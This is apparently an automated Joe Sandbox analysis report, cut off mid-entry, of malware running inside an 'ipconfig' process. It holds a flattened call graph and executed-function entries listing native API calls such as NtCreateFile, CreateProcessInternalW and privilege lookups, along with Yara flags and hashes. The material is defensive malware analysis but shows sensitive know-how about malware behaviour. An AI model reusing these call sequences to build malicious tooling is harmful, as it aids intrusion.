2a18ea0 LdrLoadDll 31536->31537 31538 2a19006 31537->31538 31539 2a18ea0 LdrLoadDll 31538->31539 31540 2a1900f 31539->31540 31541 2a18ea0 LdrLoadDll 31540->31541 31542 2a19018 31541->31542 31543 2a18ea0 LdrLoadDll 31542->31543 31544 2a19021 31543->31544 31545 2a18ea0 LdrLoadDll 31544->31545 31546 2a1902d 31545->31546 31547 2a18ea0 LdrLoadDll 31546->31547 31548 2a19036 31547->31548 31549 2a18ea0 LdrLoadDll 31548->31549 31550 2a1903f 31549->31550 31551 2a18ea0 LdrLoadDll 31550->31551 31552 2a19048 31551->31552 31553 2a18ea0 LdrLoadDll 31552->31553 31554 2a19051 31553->31554 31555 2a18ea0 LdrLoadDll 31554->31555 31556 2a1905a 31555->31556 31557 2a18ea0 LdrLoadDll 31556->31557 31558 2a19066 31557->31558 31559 2a18ea0 LdrLoadDll 31558->31559 31560 2a1906f 31559->31560 31561 2a18ea0 LdrLoadDll 31560->31561 31562 2a19078 31561->31562 31563 2a18ea0 LdrLoadDll 31562->31563 31564 2a19081 31563->31564 31565 2a18ea0 LdrLoadDll 31564->31565 31566 2a1908a 31565->31566 31567 2a18ea0 LdrLoadDll 31566->31567 31568 2a19093 31567->31568 31569 2a18ea0 LdrLoadDll 31568->31569 31570 2a1909f 31569->31570 31571 2a18ea0 LdrLoadDll 31570->31571 31572 2a190a8 31571->31572 31573 2a18ea0 LdrLoadDll 31572->31573 31574 2a190b1 31573->31574 31575 2a18ea0 LdrLoadDll 31574->31575 31576 2a190ba 31575->31576 31577 2a18ea0 LdrLoadDll 31576->31577 31578 2a190c3 31577->31578 31579 2a18ea0 LdrLoadDll 31578->31579 31580 2a190cc 31579->31580 31581 2a18ea0 LdrLoadDll 31580->31581 31582 2a190d8 31581->31582 31583 2a18ea0 LdrLoadDll 31582->31583 31584 2a190e1 31583->31584 31585 2a18ea0 LdrLoadDll 31584->31585 31586 2a190ea 31585->31586 31587 2a18ea0 LdrLoadDll 31586->31587 31588 2a190f3 31587->31588 31589 2a18ea0 LdrLoadDll 31588->31589 31590 2a190fc 31589->31590 31591 2a18ea0 LdrLoadDll 31590->31591 31592 2a19105 31591->31592 31593 2a18ea0 LdrLoadDll 31592->31593 31594 2a19111 31593->31594 31595 2a18ea0 LdrLoadDll 31594->31595 31596 2a1911a 31595->31596 31597 2a18ea0 LdrLoadDll 31596->31597 31598 2a19123 31597->31598 31599 2a18ea0 LdrLoadDll 31598->31599 31600 2a1912c 31599->31600 31601 2a18ea0 LdrLoadDll 31600->31601 31602 2a19135 31601->31602 31603 2a18ea0 LdrLoadDll 31602->31603 31604 2a1913e 31603->31604 31605 2a18ea0 LdrLoadDll 31604->31605 31606 2a1914a 31605->31606 31607 2a18ea0 LdrLoadDll 31606->31607 31608 2a19153 31607->31608 31609 2a18ea0 LdrLoadDll 31608->31609 31610 2a1915c 31609->31610 31610->31392 31612 2a191d0 LdrLoadDll 31611->31612 31613 2a1814c 31612->31613 31638 2ed9860 LdrInitializeThunk 31613->31638 31614 2a18163 31614->31319 31616->31389 31618 2a1b250 31617->31618 31619 2a1b256 31617->31619 31618->31494 31620 2a1a260 LdrLoadDll 31619->31620 31621 2a1b27c 31620->31621 31621->31494 31623 2a1b2e0 31622->31623 31624 2a1a260 LdrLoadDll 31623->31624 31626 2a1b33d 31623->31626 31625 2a1b31a 31624->31625 31627 2a1a090 2 API calls 31625->31627 31626->31505 31627->31626 31629 2a1a090 2 API calls 31628->31629 31630 2a13314 31629->31630 31630->31513 31631->31499 31633 2a18ebb 31632->31633 31634 2a13e40 LdrLoadDll 31633->31634 31635 2a18edb 31634->31635 31636 2a13e40 LdrLoadDll 31635->31636 31637 2a18f87 31635->31637 31636->31637 31637->31535 31638->31614 31640 2ed968f LdrInitializeThunk 31639->31640 31641 2ed9681 31639->31641 31640->31398 31641->31398 31643 2a191d0 LdrLoadDll 31642->31643 31644 2a188fc RtlFreeHeap 31643->31644 31644->31401 31646 2a06e30 31645->31646 31647 2a06e2b 31645->31647 31648 2a1a010 LdrLoadDll 31646->31648 31647->31327 31649 2a06e55 31648->31649 31650 2a06eb8 31649->31650 31651 2a18130 2 API calls 31649->31651 31652 2a06ebe 31649->31652 31656 2a1a010 LdrLoadDll 31649->31656 31661 2a18830 31649->31661 31650->31327 31651->31649 31653 2a06ee4 31652->31653 31655 2a18830 2 API calls 31652->31655 31653->31327 31657 2a06ed5 31655->31657 31656->31649 31657->31327 31659 2a18830 2 API calls 31658->31659 31660 2a070fe 31659->31660 31660->31284 31662 2a191d0 LdrLoadDll 31661->31662 31663 2a1884c 31662->31663 31666 2ed96e0 LdrInitializeThunk 31663->31666 31664 2a18863 31664->31649 31666->31664 31668 2a19833 31667->31668 31669 2a09b30 LdrLoadDll 31668->31669 31670 2a08a6b 31669->31670 31670->31292 31672 2a09ea3 31671->31672 31674 2a09f20 31672->31674 31687 2a17f00 LdrLoadDll 31672->31687 31674->31297 31676 2a191d0 LdrLoadDll 31675->31676 31677 2a0cf9b 31676->31677 31677->31304 31678 2a18a40 31677->31678 31679 2a18a4c 31678->31679 31680 2a191d0 LdrLoadDll 31679->31680 31681 2a18a5f LookupPrivilegeValueW 31680->31681 31681->31301 31683 2a191d0 LdrLoadDll 31682->31683 31684 2a184ec 31683->31684 31688 2ed9910 LdrInitializeThunk 31684->31688 31685 2a1850b 31685->31305 31687->31674 31688->31685 31690 2a0a027 31689->31690 31691 2a09e80 LdrLoadDll 31690->31691 31692 2a0a056 31691->31692 31692->31243 31694 2a09d74 31693->31694 31747 2a17f00 LdrLoadDll 31694->31747 31696 2a09dae 31696->31245 31698 2a0d18c 31697->31698 31699 2a0a000 LdrLoadDll 31698->31699 31700 2a0d19e 31699->31700 31748 2a0d070 31700->31748 31703 2a0d1d1 31707 2a18700 2 API calls 31703->31707 31708 2a0d1e2 31703->31708 31704 2a0d1b9 31705 2a0d1c4 31704->31705 31706 2a18700 2 API calls 31704->31706 31705->31248 31706->31705 31707->31708 31708->31248 31710 2a0aed6 31709->31710 31711 2a0aee0 31709->31711 31710->31257 31712 2a09e80 LdrLoadDll 31711->31712 31713 2a0af51 31712->31713 31714 2a09d50 LdrLoadDll 31713->31714 31715 2a0af65 31714->31715 31716 2a0af88 31715->31716 31717 2a09e80 LdrLoadDll 31715->31717 31716->31257 31718 2a0afa4 31717->31718 31719 2a13a40 7 API calls 31718->31719 31720 2a0aff9 31719->31720 31720->31257 31722 2a0ba56 31721->31722 31723 2a09e80 LdrLoadDll 31722->31723 31724 2a0ba6a 31723->31724 31767 2a0b720 31724->31767 31726 2a07f8c 31745 2a0b010 LdrLoadDll 31726->31745 31796 2a0d420 31727->31796 31729 2a07c83 31740 2a07e31 31729->31740 31801 2a13390 31729->31801 31731 2a07ce2 31731->31740 31804 2a07a20 31731->31804 31734 2a1b240 LdrLoadDll 31735 2a07d29 31734->31735 31736 2a1b370 2 API calls 31735->31736 31743 2a07d3e 31736->31743 31737 2a06e20 3 API calls 31737->31743 31740->31269 31742 2a070e0 2 API calls 31742->31743 31743->31737 31743->31740 31743->31742 31809 2a0abf0 31743->31809 31859 2a0d3c0 31743->31859 31863 2a0cea0 18 API calls 31743->31863 31744->31251 31745->31262 31746->31267 31747->31696 31749 2a0d08a 31748->31749 31757 2a0d140 31748->31757 31750 2a09e80 LdrLoadDll 31749->31750 31751 2a0d0ac 31750->31751 31758 2a181b0 31751->31758 31753 2a0d0ee 31761 2a181f0 31753->31761 31756 2a18700 2 API calls 31756->31757 31757->31703 31757->31704 31759 2a181cc 31758->31759 31760 2a191d0 LdrLoadDll 31758->31760 31759->31753 31760->31759 31762 2a1820c 31761->31762 31763 2a191d0 LdrLoadDll 31761->31763 31764 2a0d134 31762->31764 31766 2ed9fe0 LdrInitializeThunk 31762->31766 31763->31762 31764->31756 31766->31764 31768 2a0b737 31767->31768 31776 2a0d460 31768->31776 31772 2a0b7ab 31773 2a0b7b2 31772->31773 31787 2a18510 LdrLoadDll 31772->31787 31773->31726 31775 2a0b7c5 31775->31726 31777 2a0d485 31776->31777 31788 2a07120 31777->31788 31779 2a0d4a9 31780 2a13a40 7 API calls 31779->31780 31782 2a0b77f 31779->31782 31783 2a1a090 2 API calls 31779->31783 31795 2a0d2a0 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 31779->31795 31780->31779 31784 2a18950 31782->31784 31783->31779 31785 2a191d0 LdrLoadDll 31784->31785 31786 2a1896f CreateProcessInternalW 31785->31786 31786->31772 31787->31775 31789 2a0721f 31788->31789 31790 2a07135 31788->31790 31789->31779 31790->31789 31791 2a13a40 7 API calls 31790->31791 31792 2a071a2 31791->31792 31793 2a1a090 2 API calls 31792->31793 31794 2a071c9 31792->31794 31793->31794 31794->31779 31795->31779 31797 2a13e40 LdrLoadDll 31796->31797 31798 2a0d43f 31797->31798 31799 2a0d446 SetErrorMode 31798->31799 31800 2a0d44d 31798->31800 31799->31800 31800->31729 31803 2a133b6 31801->31803 31864 2a0d1f0 31801->31864 31803->31731 31805 2a1a010 LdrLoadDll 31804->31805 31808 2a07a45 31805->31808 31806 2a07c5a 31806->31734 31808->31806 31883 2a17af0 31808->31883 31810 2a0ac0f 31809->31810 31811 2a0ac09 31809->31811 31940 2a08620 31810->31940 31931 2a0ccb0 31811->31931 31814 2a0ac1c 31815 2a0aea8 31814->31815 31816 2a1b370 2 API calls 31814->31816 31815->31743 31817 2a0ac38 31816->31817 31818 2a0ac4c 31817->31818 31819 2a0d3c0 2 API calls 31817->31819 31949 2a17f80 31818->31949 31819->31818 31822 2a0ad76 31965 2a0ab90 LdrLoadDll LdrInitializeThunk 31822->31965 31823 2a18170 2 API calls 31824 2a0acca 31823->31824 31824->31822 31831 2a0acd6 31824->31831 31826 2a0ad95 31827 2a0ad9d 31826->31827 31966 2a0ab00 LdrLoadDll NtClose LdrInitializeThunk 31826->31966 31828 2a18700 2 API calls 31827->31828 31833 2a0ada7 31828->31833 31830 2a0ad1f 31832 2a18700 2 API calls 31830->31832 31831->31815 31831->31830 31835 2a18280 2 API calls 31831->31835 31836 2a0ad3c 31832->31836 31833->31743 31834 2a0adbf 31834->31827 31837 2a0adc6 31834->31837 31835->31830 31952 2a175a0 31836->31952 31839 2a0adde 31837->31839 31967 2a0aa80 LdrLoadDll LdrInitializeThunk 31837->31967 31968 2a18000 LdrLoadDll 31839->31968 31841 2a0ad53 31841->31815 31955 2a07280 31841->31955 31843 2a0adf2 31969 2a0a900 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31843->31969 31846 2a0ae16 31848 2a0ae63 31846->31848 31970 2a18030 LdrLoadDll 31846->31970 31972 2a18090 LdrLoadDll 31848->31972 31851 2a0ae34 31851->31848 31971 2a180c0 LdrLoadDll 31851->31971 31852 2a0ae71 31853 2a18700 2 API calls 31852->31853 31854 2a0ae7b 31853->31854 31855 2a18700 2 API calls 31854->31855 31857 2a0ae85 31855->31857 31857->31815 31858 2a07280 3 API calls 31857->31858 31858->31815 31860 2a0d3d3 31859->31860 32039 2a18100 31860->32039 31863->31743 31865 2a0d20d 31864->31865 31871 2a18230 31865->31871 31868 2a0d255 31868->31803 31872 2a1824c 31871->31872 31873 2a191d0 LdrLoadDll 31871->31873 31881 2ed99a0 LdrInitializeThunk 31872->31881 31873->31872 31874 2a0d24e 31874->31868 31876 2a18280 31874->31876 31877 2a191d0 LdrLoadDll 31876->31877 31878 2a1829c 31877->31878 31882 2ed9780 LdrInitializeThunk 31878->31882 31879 2a0d27e 31879->31803 31881->31874 31882->31879 31884 2a1a260 LdrLoadDll 31883->31884 31885 2a17b07 31884->31885 31904 2a08160 31885->31904 31887 2a17b22 31888 2a17b60 31887->31888 31889 2a17b49 31887->31889 31891 2a1a010 LdrLoadDll 31888->31891 31890 2a1a090 2 API calls 31889->31890 31892 2a17b56 31890->31892 31893 2a17b9a 31891->31893 31892->31806 31894 2a1a010 LdrLoadDll 31893->31894 31895 2a17bb3 31894->31895 31901 2a17e54 31895->31901 31910 2a1a050 LdrLoadDll 31895->31910 31897 2a17e39 31898 2a17e40 31897->31898 31897->31901 31899 2a1a090 2 API calls 31898->31899 31900 2a17e4a 31899->31900 31900->31806 31902 2a1a090 2 API calls 31901->31902 31903 2a17ea9 31902->31903 31903->31806 31905 2a08185 31904->31905 31906 2a09b30 LdrLoadDll 31905->31906 31907 2a081b8 31906->31907 31909 2a081dd 31907->31909 31911 2a0b330 31907->31911 31909->31887 31910->31897 31912 2a0b35c 31911->31912 31913 2a18450 LdrLoadDll 31912->31913 31914 2a0b375 31913->31914 31915 2a0b37c 31914->31915 31922 2a18490 31914->31922 31915->31909 31919 2a0b3b7 31920 2a18700 2 API calls 31919->31920 31921 2a0b3da 31920->31921 31921->31909 31923 2a184ac 31922->31923 31924 2a191d0 LdrLoadDll 31922->31924 31930 2ed9710 LdrInitializeThunk 31923->31930 31924->31923 31925 2a0b39f 31925->31915 31927 2a18a80 31925->31927 31928 2a191d0 LdrLoadDll 31927->31928 31929 2a18a9f 31928->31929 31929->31919 31930->31925 31932 2a0ccc7 31931->31932 31973 2a0bda0 31931->31973 31934 2a0cce0 31932->31934 31986 2a03d70 31932->31986 31936 2a1a260 LdrLoadDll 31934->31936 31937 2a0ccee 31936->31937 31937->31810 31938 2a0ccda 32010 2a17420 31938->32010 31942 2a0863b 31940->31942 31941 2a0875b 31941->31814 31942->31941 31943 2a0d070 3 API calls 31942->31943 31944 2a0873c 31943->31944 31945 2a0876a 31944->31945 31946 2a08751 31944->31946 31947 2a18700 2 API calls 31944->31947 31945->31814 32038 2a05ea0 LdrLoadDll 31946->32038 31947->31946 31950 2a191d0 LdrLoadDll 31949->31950 31951 2a0aca0 31950->31951 31951->31815 31951->31822 31951->31823 31953 2a0d3c0 2 API calls 31952->31953 31954 2a175d2 31953->31954 31954->31841 31956 2a07298 31955->31956 31957 2a09b30 LdrLoadDll 31956->31957 31958 2a072b3 31957->31958 31959 2a13e40 LdrLoadDll 31958->31959 31960 2a072c3 31959->31960 31961 2a072cc PostThreadMessageW 31960->31961 31962 2a072fd 31960->31962 31961->31962 31963 2a072e0 31961->31963 31962->31743 31964 2a072ea PostThreadMessageW 31963->31964 31964->31962 31965->31826 31966->31834 31967->31839 31968->31843 31969->31846 31970->31851 31971->31848 31972->31852 31974 2a0bdd3 31973->31974 32015 2a0a140 31974->32015 31976 2a0bde5 32019 2a0a2b0 31976->32019 31978 2a0be03 31979 2a0a2b0 LdrLoadDll 31978->31979 31980 2a0be19 31979->31980 31981 2a0d1f0 3 API calls 31980->31981 31982 2a0be3d 31981->31982 31983 2a0be44 31982->31983 32022 2a1a2a0 LdrLoadDll 31982->32022 31983->31932 31985 2a0be54 31985->31932 31987 2a03d96 31986->31987 31988 2a0b330 3 API calls 31987->31988 31990 2a03e61 31988->31990 31989 2a03e68 31989->31938 31990->31989 32023 2a1a2e0 31990->32023 31992 2a03ec9 31993 2a09e80 LdrLoadDll 31992->31993 31994 2a03fd3 31993->31994 31995 2a09e80 LdrLoadDll 31994->31995 31996 2a03ff7 31995->31996 32027 2a0b3f0 31996->32027 32000 2a04083 32001 2a1a010 LdrLoadDll 32000->32001 32002 2a04110 32001->32002 32003 2a1a010 LdrLoadDll 32002->32003 32005 2a0412a 32003->32005 32004 2a042a6 32004->31938 32005->32004 32006 2a09e80 LdrLoadDll 32005->32006 32007 2a0416a 32006->32007 32008 2a09d50 LdrLoadDll 32007->32008 32009 2a0420a 32008->32009 32009->31938 32011 2a13e40 LdrLoadDll 32010->32011 32012 2a17441 32011->32012 32013 2a17467 32012->32013 32014 2a17454 CreateThread 32012->32014 32013->31934 32014->31934 32016 2a0a167 32015->32016 32017 2a09e80 LdrLoadDll 32016->32017 32018 2a0a1a3 32017->32018 32018->31976 32020 2a0a2c9 32019->32020 32021 2a09e80 LdrLoadDll 32019->32021 32020->31978 32021->32020 32022->31985 32024 2a1a2ed 32023->32024 32025 2a13e40 LdrLoadDll 32024->32025 32026 2a1a300 32025->32026 32026->31992 32028 2a0b415 32027->32028 32032 2a18300 32028->32032 32031 2a18390 LdrLoadDll 32031->32000 32033 2a191d0 LdrLoadDll 32032->32033 32034 2a1831c 32033->32034 32037 2ed96d0 LdrInitializeThunk 32034->32037 32035 2a0405c 32035->32000 32035->32031 32037->32035 32038->31941 32040 2a191d0 LdrLoadDll 32039->32040 32041 2a1811c 32040->32041 32044 2ed9840 LdrInitializeThunk 32041->32044 32042 2a0d3fe 32042->31743 32044->32042 32046 2ed9540 LdrInitializeThunk

              Executed Functions

              Function 02A185CF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 289 2a185cf-2a18621 call 2a191d0 NtCreateFile
              APIs
              • NtCreateFile.NTDLL(00000060,00000000,.z`,02A13BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02A13BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02A1861D
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: CreateFile
              • String ID: .z`
              • API String ID: 823142352-1441809116
              • Opcode ID: 3b7aba30ef6c615c3673f8c3f112c484dc11ab30b08ca43e4d0db69b0fd3ced0
              • Instruction ID: 3bcea13269334693362161ad02ff0922c3a2671db959d220ea17a457b52c9a12
              • Opcode Fuzzy Hash: 3b7aba30ef6c615c3673f8c3f112c484dc11ab30b08ca43e4d0db69b0fd3ced0
              • Instruction Fuzzy Hash: A301C4B2200108BFCB58CF99DC95EEB77A9AF8C354F158248FA1DD7241C630E851CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02A185D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 292 2a185d0-2a185e6 293 2a185ec-2a18621 NtCreateFile 292->293 294 2a185e7 call 2a191d0 292->294 294->293
              APIs
              • NtCreateFile.NTDLL(00000060,00000000,.z`,02A13BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02A13BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02A1861D
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: CreateFile
              • String ID: .z`
              • API String ID: 823142352-1441809116
              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
              • Instruction ID: d4ac83d49854235a5aa802dac906e26d8327b59cfecf9a1206f808d91caf9947
              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
              • Instruction Fuzzy Hash: CBF0B2B2200208ABCB48CF88DC94EEB77EDAF8C754F158248BA0D97240C630E851CBA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02A18680 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
              Download Yara Rule
              APIs
              • NtReadFile.NTDLL(02A13D62,5E972F65,FFFFFFFF,02A13A21,?,?,02A13D62,?,02A13A21,FFFFFFFF,5E972F65,02A13D62,?,00000000), ref: 02A186C5
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
              • Instruction ID: 90a86e6baa65bf51c1379a1535d0910fecd03b49d025fe18852b0782d434b276
              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
              • Instruction Fuzzy Hash: B7F0A9B2200108ABCB14DF89DC94DEB77ADAF8C754F158248BE1D97241D630E851CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02A1867A Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
              Download Yara Rule
              APIs
              • NtReadFile.NTDLL(02A13D62,5E972F65,FFFFFFFF,02A13A21,?,?,02A13D62,?,02A13A21,FFFFFFFF,5E972F65,02A13D62,?,00000000), ref: 02A186C5
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: ee392e534eff44da077745e3c797d5cf3d0bda81944258abb584fc74e3a700ec
              • Instruction ID: 89617c9f1a388ab7bb06c9a16de038893554baa35883e6e5e7365f115a3f745c
              • Opcode Fuzzy Hash: ee392e534eff44da077745e3c797d5cf3d0bda81944258abb584fc74e3a700ec
              • Instruction Fuzzy Hash: D8F0F9B2200109AFDB04CF89CC84EEB77ADAF8C354F018248BE0D97250C630E851CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02A18700 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
              Download Yara Rule
              APIs
              • NtClose.NTDLL(02A13D40,?,?,02A13D40,00000000,FFFFFFFF), ref: 02A18725
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: Close
              • String ID:
              • API String ID: 3535843008-0
              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
              • Instruction ID: b7ac4ea09f94fdc2dee1e3a29a53cffff6e1cc2ed739affc36c2da5d1d480c72
              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
              • Instruction Fuzzy Hash: A0D012752402146BD714EB98CC49E97779DEF44760F154455BA1C5B241C570F500C6E0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ED9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 565f625c5c79168b4112b076a53308e538378d14e7a5657b154c5e8d9b5013f4
              • Instruction ID: 155764f4a095fa81f8076f5c88533c7c182c14b54ff348da639301d71e7d2434
              • Opcode Fuzzy Hash: 565f625c5c79168b4112b076a53308e538378d14e7a5657b154c5e8d9b5013f4
              • Instruction Fuzzy Hash: EF90026135180042D60065A94C15B57000D97D0383F51D115A4154554CC9558861A561
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ED9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 1240fd59a5f73a3515c2ba9108b219659321bdf9b8648cd2f3af5ba1ee8bd580
              • Instruction ID: 38a0fab0f584bf6d785434f702a50c87b86cf5f56d4eb549468532aa8407a811
              • Opcode Fuzzy Hash: 1240fd59a5f73a3515c2ba9108b219659321bdf9b8648cd2f3af5ba1ee8bd580
              • Instruction Fuzzy Hash: 0090027134100413D51161994905757000D97D02C1F91D412A4424558D96968952F161
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ED9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 801f38400f9436290eaf8f8335927e83c7c447c4c78df39082b3a3c41326a9b5
              • Instruction ID: 12b3e70cd803ea4e2c11e700a4a60ba7a7a9accb63cc07d433c5a7dbdb8819ad
              • Opcode Fuzzy Hash: 801f38400f9436290eaf8f8335927e83c7c447c4c78df39082b3a3c41326a9b5
              • Instruction Fuzzy Hash: 87900261382041525945B1994805557400EA7E02C1791D012A5414950C85669856E661
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ED99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 851e6d6c98455095a6e1ef3197f1ccc3294df559db1408ab49e3be92b8d92029
              • Instruction ID: 5da3de8bb9b73e1992dd5634f5941f5eb46791095850fa9056de0441719a0e22
              • Opcode Fuzzy Hash: 851e6d6c98455095a6e1ef3197f1ccc3294df559db1408ab49e3be92b8d92029
              • Instruction Fuzzy Hash: B59002A138100442D50061994815B57000DD7E1381F51D015E5064554D8659CC52B166
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ED9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: c3cbe1af980cc12e80d7d0a92815492a5d040192917384ab08e566f66fe13f44
              • Instruction ID: e8e6c5e66ad363f232f699786a2537a0716b7dc8a6b4859072290c47772edbbd
              • Opcode Fuzzy Hash: c3cbe1af980cc12e80d7d0a92815492a5d040192917384ab08e566f66fe13f44
              • Instruction Fuzzy Hash: 7D9002B134100402D54071994805797000D97D0381F51D011A9064554E86998DD5B6A5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ED96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: a34713c59b8eeff4df6108e58465d3c7fef670cc0b4a9f97f20344447081d18a
              • Instruction ID: f78f36430cc4e253b685047490f5fb734af7dfae01d6f28c36c47dba7da22d5c
              • Opcode Fuzzy Hash: a34713c59b8eeff4df6108e58465d3c7fef670cc0b4a9f97f20344447081d18a
              • Instruction Fuzzy Hash: 6890027134108802D5106199880579B000D97D0381F55D411A8424658D86D58891B161
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ED96D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
